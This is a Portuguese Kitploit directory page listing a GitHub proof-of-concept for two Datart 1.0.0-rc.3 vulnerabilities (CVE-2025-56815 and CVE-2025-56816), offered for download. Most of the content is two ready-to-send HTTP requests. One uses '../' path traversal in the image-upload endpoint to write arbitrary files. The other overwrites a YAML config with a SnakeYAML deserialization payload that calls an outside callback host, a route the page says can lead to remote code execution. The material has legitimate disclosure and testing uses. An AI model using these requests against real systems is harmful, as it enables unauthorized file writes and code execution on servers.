Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-56815 — Datart 1.0.0-rc.3 é vulnerável a Directory Traversal na interface POST /viz/image, uma vez que o servidor utiliza diretamente MultipartFile.transferTo() para salvar o arquivo enviado em um caminho controlável pelo usuário e não possui verificação rigorosa do nome do arquivo. | Kitploit
Ferramentas/GitHubGitHub/xiaoxiaoranxxx/cve-2025-56815
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoConfiguração Incorreta
GitHubxiaoxiaoranxxx/cve-2025-56815

CVE-2025-56815

Datart 1.0.0-rc.3 é vulnerável a Directory Traversal na interface POST /viz/image, uma vez que o servidor utiliza diretamente MultipartFile.transferTo() para salvar o arquivo enviado em um caminho controlável pelo usuário e não possui verificação rigorosa do nome do arquivo.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
5há 11 mesesAinda não revisado

CVE-2025-56815

Datart 1.0.0-rc.3 é vulnerável a Directory Traversal na interface POST /viz/image, uma vez que o servidor utiliza diretamente MultipartFile.transferTo() para salvar o arquivo enviado em um caminho controlável pelo usuário, e não possui uma verificação rigorosa do nome do arquivo.

root@kitploit:~
POST /api/v1/files/viz/image?ownerType=DASHBOARD&ownerId=66822c13a9bc4381923456c11339497e&fileName=../../../../../../../../tmp/1 HTTP/1.1
Host: test.com
Accept-Language: zh-CN
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySInMdoLRiubl32BW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Length: 4646

------WebKitFormBoundarySInMdoLRiubl32BW
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type: image/jpeg

xxxxx
------WebKitFormBoundarySInMdoLRiubl32BW--

CVE-2025-56816

Datart 1.0.0-rc. 3 é vulnerável a Directory Traversal. O tratamento de arquivos de configuração da aplicação permite que atacantes enviem arquivos YAML arbitrários para o caminho config/jdbc-driver-ext. yml. A aplicação analisa este arquivo usando o método inseguro load() ou loadAs() do SnakeYAML, sem sanitização de entrada. Isso permite a desserialização de conteúdo YAML controlado pelo atacante, levando à instanciação arbitrária de classes. Sob certas condições, isso pode ser explorado para alcançar execução remota de código (RCE).

root@kitploit:~
POST /api/v1/files/viz/image?ownerType=DASHBOARD&ownerId=66822c13a9bc4381923456c11339497e&fileName=../../../../../config/jdbc-driver-ext.yml HTTP/1.1
Host: test.com
Accept-Language: zh-CN
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySInMdoLRiubl32BW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Length: 4646

------WebKitFormBoundarySInMdoLRiubl32BW
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type: image/jpeg

{!!java.net.URL ["http://test.eyes.sh/"]: 1}
------WebKitFormBoundarySInMdoLRiubl32BW--
Baixar ferramenta